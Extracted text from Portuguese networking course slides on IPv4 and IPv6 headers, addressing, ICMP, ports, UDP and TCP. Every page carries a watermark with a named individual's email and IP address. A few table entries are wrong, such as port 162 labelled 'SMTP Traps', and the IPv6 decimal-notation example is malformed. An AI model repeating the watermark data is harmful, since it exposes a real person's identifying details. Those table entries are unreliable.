2 - Média 001100 010100 011100 100100
3 - Alta 001110 010110 011110 100110
• Classe EF (Expedited Forwarding) – RFC 2598: Esta classe oferece um serviço de redes
com baixa perda, baixo jitter e banda garantida. É indicado para as aplicações de tempo real.
É utilizado apenas um DSCP de valor 101110.
76
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP
• Para fornecer compatibilidade com a antiga definição de precedência do campo ToS (Precedência),
são utilizados Class Selector Codepoints.
Class Selector
Codepoint
Precedência IPv4
000000 000 - Normal
001000 001 - Prioridade
010000 010 - Imediato
011000 011 - Flash
100000 100 - Flash Override
101000 101 - Crítico
110000
110 - Controle de Interligação de 
Redes
111000 111 - Controle de Rede
77
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
• O campo IDENTIFICAÇÃO possui 16 bits e é um
valor único associado pela origem para ajudar na
remontagem de fragmentos de um datagrama.
• O campo FLAGS, de três bits, é responsável pelo
controle da fragmentação. O primeiro bit sempre é
zero, o segundo bit é o DF (Don’t Fragment) e o
terceiro bit é o MF (More Fragments).
➢ Os pequenos pedaços em que cada datagrama
é divido são chamados fragmentos.
➢ Fragmentação é o processo de dividir os
datagramas em fragmentos.
Fonte: Redes de Computadores e a Internet,
James Kurose, 6ª Edição, Pág: 249
78
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
• O campo DESLOCAMENTO (Fragment Offset), de 13 bits, é usado em datagramas fragmentados
para ajudar na remontagem do mesmo.
➢ O valor desse campo é medido em unidades de 8 octetos (64 bits). Os bytes do cabeçalho não
sãocontados.
➢ Para um fragmento, o campo DESLOCAMENTO especifica em que posição no datagrama
original se encontram os dados que estão sendo transportados no fragmento.
79
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791) - Fragmentação
80
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP – Filtros para Fragmentos
• FLAGS = 000 e DESLOCAMENTO = 0
➢ Significa que o datagrama é um datagrama completo e não um fragmento.
• FLAGS = 001 e DESLOCAMENTO = 0
➢ Significa que o datagrama é um fragmento e que este fragmento é o primeiro do conjunto de
fragmentos.
• FLAGS = 001 e DESLOCAMENTO ≠ 0
➢ Significa que o datagrama é um fragmento e que este fragmento é um fragmento intermediário
(entre o primeiro e o último do conjunto de fragmentos).
• FLAGS = 000 e DESLOCAMENTO ≠ 0
➢ Significa que o datagrama é o último fragmento do conjunto de fragmentos.
• FLAGS = 010 e DESLOCAMENTO = 0
➢ Significa que o datagrama não pode ser fragmentado.
81
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
• O campo PROTOCOLO, de 8 bits, especifica qual protocolo de alto nível foi utilizado para criar a
mensagem que está sendo transportada na área de dados do datagrama.
0 Reservado
1 Internet Control Message Protocol (ICMP)
2 Internet Group Management Protocol (IGMP)
4 IP (IP Encapsulado)
6 Transmission Control Protocol (TCP)
8 Exterior Gateway Protocol (EGP)
9 Private Interior Routing Protocol
17 User Datagram Protocol (UDP)
41 IP versão 6 (IPv6)
89 Open Shortest Path First (OSPF)
82
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
• O campo CHECKSUM, de 16 bits, assegura a integridade dos valores do cabeçalho do datagrama.
• O campo ENDEREÇO IP DE ORIGEM, de 32 bits, identifica o host que está enviando o
datagrama.
• O campo ENDEREÇO IP DE DESTINO, de 32 bits, identifica o host que irá receber o datagrama.
• O campo TEMPO DE VIDA ou TTL (Time to Live), de 8 bits, especifica quanto tempo o
datagrama pode permanecer no sistema de interligação de redes.
83
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
• O campo OPÇÕES que se segue ao endereço de destino não é necessário em todo datagrama, e as
opções são incluídas principalmente para testes ou depuração da rede.
• O campo COMPLEMENTO (Padding) depende das opções selecionadas.
➢ Representa bits contendo o valor zero e que podem ser necessários para garantir que o
cabeçalho do datagrama se estenda até o múltiplo exato de 32 bits.
CLASSE SIGNIFICADO
0 Datagrama ou Controle de Rede
1 Reservado
2 Debugging e Medição
3 Reservado
CLASSE NÚMERO TAMANHO DESCRIÇÃO
0 0 - Fim da lista.
0 1 - No Operation (NOP).
0 3 Variável Loose Source Route. (Rota Ampliada/Flexível)
0 7 Variável Record Route. (Registro de Rota)
0 9 Variável Strict Source Route. (Rota Restrita/Rígida)
84
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791) – Registro de Rota
85
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791) – Rota Restrita/Rígida
86
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791) – Rota Ampliada/Flexível
87
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Endereçamento 
IPv4
Classful Addressing
88
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Endereço IP
• É um número de 32 bits dividido em 4 seções, referenciadas como octetos, onde cada seção
contém um byte (8 bits).
➢ Ex: 10101100.00010000.00011110.00111000
• É costumeiramente escrito como 4 números decimais separados por um ponto - notação ponto
decimal (dotted-decimal notation).
➢ Ex: 172.16.30.56
• Podemos representar o IP em outros formatos?
89
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Classes de Endereçamento – Classful IP Addressing
90
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Endereços IP Privados / Reservados (RFCs 1918/3927)
10.0.0.1 até 10.255.255.254
172.16.0.1 até 172.31.255.254
192.168.0.1 até 192.168.255.254
169.254.0.1 até 169.254.255.254
APIPA – Automatic Private IP Address
91
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Classes Especiais de Endereço IP
92
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Posição do Algarismo 3 2 1 0
Base 2 2 2 2
Valor do Algarismo (Bit) 1 0 1 1
Cálculo
1*23 0*22 1*21 1*20
8 0 2 1 11
Convertendo o Endereço IP para Outro Formato
93
10.11.1.2
11 / 2 = 5
11 mod 2 = 1
5 / 2 = 2
5 mod 2 = 1
2 / 2 = 1 
2 mod 2 = 0
11 2
51
5 2
21
2 2
10
1011
De Decimal 
para Binário
De Binário 
para Decimal
+ + +
+ + + =
෍
𝑃𝑜𝑠𝑖çã𝑜=1
𝑁
𝑉𝑎𝑙𝑜𝑟 𝑑𝑜 𝐴𝑙𝑔𝑎𝑟𝑖𝑠𝑚𝑜 ∗ 2𝑃𝑜𝑠𝑖çã𝑜Fórmula 
Padrão
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Convertendo o Endereço IP para Outro Formato
94
10 . 11 . 1 . 2
00001010.00001011.00000001.00000010
De IP para 
Decimal
+ + +
=
෍
𝑃𝑜𝑠𝑖çã𝑜=1
𝑁
𝑉𝑎𝑙𝑜𝑟 𝑑𝑜 𝐴𝑙𝑔𝑎𝑟𝑖𝑠𝑚𝑜 ∗ 256𝑃𝑜𝑠𝑖çã𝑜Fórmula 
Padrão
Posição do Bit 3 2 1 0
Base 256 256 256 256
Valor do Algarismo (Bit) 10 11 1 2
Cáclculo 10*2563 11*2562 1*2561 2*2560
167772160 720896 256 2 168493314+ + +
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Sua Vez de Exercitar
95
Converta o número “919540840” para o formato de IP.
Fonte: Pixabay
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
IPv6
Internet Protocol
Versão 6
96
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
IP Versão 6 (RFC 8200)
• Capacidade de endereçamento expandida
➢ 128 bits
➢ Endereço anycast
• Cabeçalho aprimorado de 40 bytes
➢ Ausência de checksum: removido inteiramente para reduzir o tempo de processamento em
cada salto
➢ Processamento de opções mais flexível: são permitidas, mas são alocadas em cabeçalhos
suplementares, indicados pelo campo “Next header”
• Esquema de fragmentação e remontagem otimizado
➢ A fragmentação ocorre apenas nos sistemas finais
• Rotulação de fluxo e prioridade
• Nova versão de ICMP
➢ Tipos de mensagens adicionais , ex.: “Packet Too Big”
➢ Funções de gerenciamento de grupos multicast (incorporou o Internet Group Management
Protocol)
97
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IPv4 x Cabeçalho IPv6
IPv4 IPv6
98
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IPv6 (RFC 8200)
• VERSÃO: Esse campo de 4 bits identifica o número da versão do IP.
• CLASSE DE TRÁFEGO: Esse campo de 8 bits tem função semelhante a do campo ToS do IPv4.
• RÓTULO DE FLUXO: Esse campo de 20 bits é usado para identificar um fluxo de datagramas.
• TAMANHO ÁREA DE DADOS: Possui um valor de 16 bits que é tratado como um número
inteiro sem sinal que dá o número de bytes do datagrama IPv6 que se segue ao cabeçalho.
• PRÓXIMO CABEÇALHO: Esse campo de 8 bits identifica o protocolo ao qual o conteúdo
(campo de dados) do datagrama será entregue (por exemlo, TCP ou UDP). Usa os mesmos valores
do campo de protocolo no cabeçalho IPv4.
• LIMITE DE SALTOS: O conteúdo desse campo de 8 bits é decrementado de um para cada
roteador que repassa o datagrama. Assim como no IPv4, se o valor chegar a zero, o datagrama é
descartado.
• ENDEREÇO IP DE ORIGEM: Endereço IPv6 de origem. Possui 128 bits.
• ENDEREÇO IP DE DESTINO: Endereço IPv6 de destino. Possui 128 bits.
99
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Endereçamento IPv6 (RFC 4291)• Link-Local Address (LLA)
➢ Sempre começam com FE80 ou 1111 1110 1000 0000
➢ Similar a um endereço APIPA IPv4
• Unique Address (UA) – RFC 4193
➢ Sempre começam com FC00 ou 1111 1100
➢ Similar a um endereço privado IPv4
• Global Address (GA)
➢ Sempre começam com um valor entre 2000-3FFF
➢ Os três primeiros bits são sempre 001
➢ Similar a um endereço público IPV4
100
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Endereçamento IPv6 (RFC 4291)
• Subrede
➢ Os primeiros 48 bits (6 bytes) representam o prefixo da rede.
➢ Os próximos 16 bits (2 bytes) representam a porção de subrede.
➢ Os últimos 64 bits (8 bytes) identificam o host (chamado de Interface ID ou Device ID)
• Multicast
➢ Sempre começam com FF0x, onde o x é representado por um número entre 1 e 8
✓ FF02::1 (todos os nós)
✓ FF02::2 (todos os roteadores)
✓ FF:02::1:2 (DHCPv6)
• Loopback
➢ Representado por 0000:0000:0000:0000:0000:0000:0000:0001, mas pode ser representado por ::1
101
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Exemplos de Endereços IPv6
• Um número IPv6 expresso em notação decimal seria assim:
104.230.140.100. 255.255. 255.255..0.0.17.128.150.10.255.255
• Abaixo o mesmo número na notação hexadecimal:
68E6:8C64:FFFF:FFFF:0000:1180:096A:FFFF
• O endereço a seguir: FF05:0000:0000:0000:0000:0000:0000:00B3
➢ Pode ser representado da seguinte forma: FF05::B3
• E um endereço IPv4, por exemplo, 128.10.2.1 pode ser representado no formato IPv6 como: 
::128.10.2.1
102
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Resumo Comparativo – IPv4 x IPv6
IPv4 IPv6
Endereço de 32 Bits Endereço de 128 Bits
Endereço em formato binário (Notação Decimal) Endereço em formato hexadecimal (Notação Canônica)
Endereço divido em 4 partes (Cada parte 1 byte) Endereço divido em 8 partes (Cada parte 2 bytes)
Ex: 10101100.00010000.00011110.00111000 Ex: 68E6:8C64:FFFF:FFFF:0000:1180:096A:FFFF
Anycast
Unicast (Unique Address, Link-Local Address ou Global Address)
Multicast sempre começa com FF0x, onde x = [1,8]
Loopback = 127.x.x.x, onde x = [1,254] Loopback = 0000:0000:0000:0000:0000:0000:0000:0001 (::1)
Subrede: Subrede:
Classe A: Rede.Host.Host.Host Rede: 6 primeiros bytes (48 bits)
Classe B: Rede.Rede.Host.Host Subrede: 2 bytes (16 bits)
Classe C: Rede.Rede.Rede.Host Host ID/Interface ID/Device ID: 8 últimos bytes (64 bits)
Unicast; Multicast; Broadcast
103
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
ICMP
Internet Control
Message Protocol
104
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
ICMP (RFC 792) 
• O ICMP (Internet Control Message Protocol) permite que hosts e roteadores enviem mensagens
de controle e mensagens de erro para outros roteadores ou hosts.
• Roteadores usam o ICMP para relatar problemas.
• Hosts usam o ICMP para testar se os destinos estão alcançáveis.
• O ICMP provê comunicação entre o software IP em um host e o software IP em outro host.
• Quando um datagrama causa um erro, o ICMP apenas relata a condição de erro ao host de origem.
• A fonte de origem do datagrama deve relatar o erro a uma aplicação ou realizar uma outra ação
para corrigir o problema.
105
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Entrega de uma Mensagem ICMP
• Cada mensagem ICMP é encapsulada em
um datagrama IP.
• Para evitar problemas de congestionamento
mensagens ICMP não são geradas para
erros causados por mensagens ICMP.
• Apesar de serem transportadas encapsuladas
em datagramas IP, mensagens ICMP NÃO
são consideradas parte de protocolos de
camadas mais altas. O ICMP é uma parte
necessária ao funcionamento do IP.
106
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Formato de uma Mensagem ICMP
• Embora cada mensagem ICMP possua um formato específico, todas elas começam com os
mesmos três campos:
➢ TIPO: Identifica a mensagem
➢ CODIGO: Fornece informações sobre o tipo da mensagem
➢ CHECKSUM: Usa o mesmo esquema de checagem que o protocolo IP, mas cobre apenas a
mensagem ICMP.
Valor do 
Campo TIPO
Descrição do Tipo de 
Mensagem
0 Echo Reply
3 Destination Unreachable
4 Source Quench
8 Echo Request
11 Time Exceeded
12 Parameter Problem
13 Timestamp Request
14 Timestamp Reply
107
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Echo Request / Echo Reply
• O campo DADOS possui tamanho variável e pode conter dados a serem retornados para o
emissário. Uma mensagem Echo Reply retorna exatamente os mesmos dados que foram recebidos
na mensagem Echo Request.
• Os campos IDENTIFICADOR e NÚMERO DE SEQUÊNCIA são usados pelo emissário para
combinar as mensagens de requisição (Echo Request) com as mensagens de resposta (Echo
Reply).
• O campo CÓDIGO neste tipo de mensagem sempre será zero.
• O campo TIPO poderá assumir dois valores: Echo Request (8) e Echo Reply (0).
108
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Echo Request / Echo Reply
• O programa PING (Packet InterNet Groper) é utilizado para verificar o funcionamento de um host
e se o mesmo se encontra acessível.
• Através deste programa podemos verificar se a pilha de protocolos TCP/IP está funcionando
corretamente, pois se tudo estiver funcionando corretamente, os seguintes passos deverão ocorrer:
➢ O software IP no computador de origem deve encaminhar o datagrama;
➢ Roteadores intermediários entre a origem e o destino devem estar operacionais e devem
encaminhar o datagrama corretamente;
➢ O host de destino deverá estar funcionando e tanto o software IP quanto o ICMP deverão estar
funcionando;
➢ As tabelas de roteamento nos roteadores ao longo do percurso devem possuir informações
para formar um caminho viável entre a origem e o destino.
109
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Echo Request / Echo Reply
Default TTLs: http://subinsb.com/default-device-ttl-values
110
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
http://subinsb.com/default-device-ttl-values
Localização do TTL no SO
• No Linux o TTL padrão estará localizado em /proc/sys/net/ipv4/ip_default_ttl.
• No Windows para se alterar o TTL padrão deve ser criada a entrada DefaultTTL no
seguinte caminho do registro :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
netsh interface ipv4 set global defaultcurhoplimit = <novo_TTL>
111
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Time Exceeded
• Erros nas tabelas de rotas podem causar erros do tipo “routing cycle” (loops de roteamento).
• Para prevenir este tipo de erro existe o campo TTL (Time to Live) ou Hop Count no cabeçalho
IP.
• Toda vez que um datagrama é descartado devido ao valor do campo TTL ter chegado a zero
ou por causa de um timeout gerado pela espera dos fragmentos de uma mensagem (entre 60 e
120 segundos), um roteador envia uma mensagem ICMP do tipo Time Exceeded para a
origem do datagrama.
Valor do Campo 
CÓDIGO
Descrição
0 TTL Excedeu
1 Tempo de Remontagem de Fragmentos Excedeu
112
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
tracert / traceroute
O Traceroute utiliza uma faixa de portas UDP “exclusivas para este serviço” (33434 – 33534).
(RFC 1393)
113
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
CountryTraceroute
114
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
pathping / mtr
115
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Destination Unreachable
• Quando um roteador não consegue encaminhar ou entregar um datagrama IP, ele envia
uma mensagem do tipo Destination Unreachable (TIPO 3) de volta a origem.
• O destino pode estar inalcançável devidoas seguintes razões:
➢ O hardware está temporariamente fora de serviço
➢ O emissário especificou um endereço de destino inexistente
➢ O roteador não tem uma rota para a rede de destino
• Junto com a mensagem são enviadas informações a respeito do host que originou a
mensagem de erro.
116
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Destination Unreachable
• Erros do tipo Network Unreachable ocorrem devido a falhas de encaminhamento nos nós
intermediários.
• Erros do tipo Host Unreachable ocorrem devido a falhas na entregados pacotes ao destino final.
Valor do Campo 
CÓDIGO
Descrição
0 Network Unreachable
1 Host Unreachable
2 Protocol Unreachable
3 Port Unreachable
4 Fragmentation Needed and DF Set
5 Source Routed failed
117
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Timestamp Request / Timestamp Reply
• Relógios (Clocks) que diferem muito de um host para o outro podem confundir sistemas
distribuídos.
• Para sincronizar seus relógios dois hosts trocam mensagens ICMP entre si do tipo Timestamp
Request e Timestamp Reply.
118
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Timestamp Request / Timestamp Reply
• O campo TIPO poderá assumir dois valores: Timestamp Request (13) e Timestamp Reply (14).
• O campo CÓDIGO neste tipo de mensagem sempre será zero.
• Os campos IDENTIFICADOR e NÚMERO DE SEQUÊNCIA são usados pelo emissário para combinar
as mensagens de requisição (Timestamp Request) com as mensagens de resposta (Timestamp Reply).
119
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Timestamp Request / Timestamp Reply
• O campo TIMESTAMP ORIGINAL é preenchido pelo emissário momentos antes da
mensagem Timestamp Request ser transmitida.
• O campo TIMESTAMP DE RECEPÇÃO é preenchido pelo destinatário imediatamente
após o recebimento da mensagem Timestamp Request.
• O campo TIMESTAMP DE TRANSMISSÃO é preenchido pelo destinatário
imediatamente antes do envio da mensagem Timestamp Reply.
120
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
PORTAS e 
JANELAS
121
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Portas de Protocolo
• Ao invés de se pensar que um processo é o destino final de um datagrama, devemos imaginar que
cada máquina contém um conjunto de pontos de destinos abstratos chamados de “Portas de
Protocolo”.
• Cada porta é identificada por um número inteiro positivo.
• O sistema operacional fornece uma interface que o processo usa para especificar a porta ou
acessá-la.
• Portas são “buferizadas”.
• Para se comunicar com uma porta em um host destino, um emissário precisa saber o endereço IP
da máquina de destino e o número da porta do protocolo de destino.
• Cada mensagem deve conter o número da porta na máquina de destino e o número da porta da
máquina de origem.
122
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Portas Reservadas e Portas Disponíveis
• A Internet Assigned Numbers Authority (IANA) designa números de porta. A IANA é um órgão de
padrões responsável pela designação de vários padrões de endereçamento. Existem diferentes
tipos de números de portas:
• Portas Conhecidas (Números 0 a 1023) - Esses números estão reservados para serviços e
aplicações.
• Portas Registradas (Números 1024 a 49151) - Estes números de portas são designados para
processos ou aplicações de usuário. Estes processos são principalmente aplicações individuais que
um usuário escolheu para instalar em vez de aplicações comuns que receberiam uma Porta
Conhecida. Quando não usadas para um recurso de servidor, estas portas também podem ser
dinamicamente selecionadas por um cliente como sua porta de origem.
• Portas Dinâmicas ou Privadas (Números 49152 a 65535) - Elas são geralmente designadas
dinamicamente a aplicações de cliente quando se inicia uma conexão.
123
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
UDP
User Datagram Protocol
124
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
UDP (RFC 768)
• O protocolo UDP (User Datagram Protocol) fornece o mesmo mecanismo não confiável e de
entrega de datagramas sem conexão que o protocolo IP.
• A responsabilidade pela confiabilidade da comunicação é do programa aplicativo.
• Cada mensagem UDP é chamada de datagrama do usuário.
• Um datagrama UDP consiste de duas partes: o cabeçalho UDP e a área de dados.
• O cabeçalho é dividido em quatro campos de 16 bits.
125
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho UDP (RFC 768)
• Os campos PORTA DE ORIGEM e PORTA DE DESTINO contém os número das portas
dos protocolos de origem e destino, respectivamente. O campo PORTA DE ORIGEM é
opcional. Se não estiver sendo usado, deve conter o valor zero.
• O campo TAMANHO DO DATAGRAMA contém a quantidade de octetos no datagrama
UDP, incluindo o cabeçalho e a área de dados.
• O campo CHECKSUM é opcional. Caso possua o valor zero, significa que o mesmo não
está sendo usado. Utiliza o mesmo algoritmo que o protocolo IP.
126
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Principais Portas UDP
127
Porta Descrição
53 DNS (Domain Name System)
67 DHCP (Dynamic Host Configuration Protocol-Servidor)
68 DHCP (Dynamic Host Configuration Protocol-Cliente)
69 TFTP (Trivial File Transfer Protocol)
88 Kerberos
161 SNMP (Simple Network Management Protocol)
162 SMTP Traps
514 Syslog
520 RIP (Routing Information Protocol)
546 DHCPv6 (Dynamic Host Configuration Protocol-Cliente)
547 DHCPv6 (Dynamic Host Configuration Protocol-Servidor)
944 NFS (Network File System)
973 NFSv6 (Network File System)
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
TCP
Transmission Control
Protocol
128
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Serviço de Entrega Confiável
• Orientado a Fluxo (Stream): Quando dois programas aplicativos transferem grandes volumes de
dados, os dados são vistos como um fluxo (stream) de bits, dividido em octetos ou bytes.
• Circuito Virtual: Descreve conexões que aparentemente são vistas como conexões entre
hardwares dedicados, mas que nada mais são do que uma ilusão causada pelo serviço de entrega
de streams, ou seja, não existe um link (físico) dedicado entre os hosts de origem e destino.
• Transferência “Buferizada”: Os dados são armazenados em buffers antes de serem enviados
pelo host de origem e antes de serem processados pelo host de destino.
• Conexão Full-Duplex: Os dados trafegam em ambas as direções (do host A para Host B e do host
B para o host A).
129
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Portas, Conexões e Sistemas Finais 
• O TCP (Transmission Control Protocol) permite que múltiplos aplicativos em um dado host se
comuniquem concorrentemente demultiplexando o tráfego TCP entre estes aplicativos.
• O TCP utiliza “portas” para identificar o destino final em um dado host. A cada porta é associado
um número inteiro usado para identificá-la.
• Um dado número de porta não corresponde a um único objeto. O TCP utiliza uma abstração
chamada “conexão” em que os objetos a serem identificados são circuitos virtuais e não portas.
• Uma conexão é identificada por um par de sistemas finais.
• Um sistema final é definido por um par (host,porta), aonde host é o endereço IP de um host e
porta é o número de uma porta TCP naquele host.
130
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Passive Open e Active Open
• Ao contrário do UDP, o TCP é um protocolo orientado a conexão que precisa que ambos os
sistemas finais concordem em participar da comunicação.
• Um sistema final A, irá contatar seu sistema operacional e indicar que irá aceitar conexõesde
entrada. Neste momento o sistema operacional irá associar uma porta TCP para o recebimento de
conexões. A isto dá-se o nome de passive open.
• Em um outro sistema final B, seu sistema operacional irá gerar uma porta TCP aleatória para que o
mesmo realize uma solicitação explícita de conexão em uma porta TCP de um sistema final A. A
isto dá-se o nome de active open.
Cliente Servidor
Porta TCP 80Porta TCP 3365
131
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Janela Deslizante
• Para o TCP um stream de dados é uma sequência de octetos ou bytes que é divida em segmentos
antes de serem transmitidos.
• A janela deslizante do TCP é utilizada para prover maior eficiência na transmissão e efetuar
controle de fluxo.
• A janela deslizante do TCP é um mecanismo que opera a nível de octetos, NÃO a nível de
segmento ou pacotes.
• Os octetos de um stream de dados são numerados sequencialmente e o emissário mantém 3
ponteiros associados a cada conexão.
Fonte: Interligação de Redes com TCP/IP, Douglas Comer, 6ª Edição, Pág: 237
132
Janela Atual
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Janela Deslizante
Fonte: Interligação de Redes com TCP/IP, Douglas Comer, 6ª Edição, Pág: 237
• O primeiro ponteiro P1, separa os octetos que foram enviados e reconhecidos dos octetos que
foram enviados, mas que ainda não foram reconhecidos.
• O segundo ponteiro P2, indica até qual octeto da sequência poderá ser enviado antes que mais
reconhecimentos sejam recebidos.
• O terceiro ponteiro P3, separa os octetos que já foram enviados dos octetos que ainda serão
enviados.
133
Janela Atual
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Anúncio de Janela – Window Advertisement
• A janela deslizante TCP permite que o tamanho da janela seja alterado dinamicamente durante a
conexão. A esse mecanismo chamamos de anúncio de janela (Window Advertisement).
• A cada mensagem de reconhecimento (ACK) é especificado um tamanho de janela que o
destinatário poderá processar até a próxima mensagem de reconhecimento ser enviada.
• A vantagem deste mecanismo é prover controle de fluxo bem como uma transferência confiável.
• Um mecanismo de controle de fluxo é essencial em um ambiente onde hosts de várias velocidades
e tamanhos se comunicam através de redes e roteadores de várias velocidades e capacidades.
• Quando um host intermediário se torna sobrecarregado acontece uma situação chamada de
“congestionamento”.
134
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho TCP (RFC 793)
• Os campos PORTA DE ORIGEM e PORTA DE DESTINO contém o número das portas
que identificam a aplicação nas extremidades da conexão.
• O campo NÚMERO DE SEQUÊNCIA identifica a posição no stream de bytes de dados
no segmento enviado.
• O campo NÚMERO DE RECONHECIMENTO identifica o número do octeto que a
origem espera receber a seguir.
135
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho TCP (RFC 793)
• O campo TAMANHO DO CABEÇALHO contém um inteiro que especifica o tamanho do
cabeçalho em múltiplos de 32 bits.
• O campo JANELA especifica o tamanho do buffer de cada janela.
• O campo RESERVADO está reservado para uso futuro.
136
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho TCP (RFC 793) – Flags
• Quando o bit URG está habilitado, significa que os dados ao chegarem no destinatário deverão ser
enviados imediatamente a aplicação, não importando se existem outros dados na fila esperando para
serem processados.
• Ao habilitar o bit URG, no campo PONTEIRO URGENTE, será especificado um valor a ser
acrescido ao campo NÚMERO DE SEQUÊNCIA indicando o número de sequência do último byte
dos dados urgentes.
• Ao habilitar o bit PSH:
➢ No emissário, os bytes a serem enviados não serão colocados em um buffer, ou seja, serão
imediatamente enviados ao destinatário;
➢ No destinatário, os bytes armazenados em buffer, juntamente com os bytes recebidos no
segmento com o bit PSH habilitado, serão entregues imediatamente a aplicação de destino.
Bit (Da esquerda para Direita) Significado (Se o bit for 1)
URG Campo PONTEIRO URGENTE é válido
ACK Campo NÚMERO DE RECONHECIMENTO é válido
PSH Este segmento requer envio urgente
RST Aborta a conexão
SYN Sincroniza os números de sequência
FIN Fim de envio de dados neste sentido
137
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
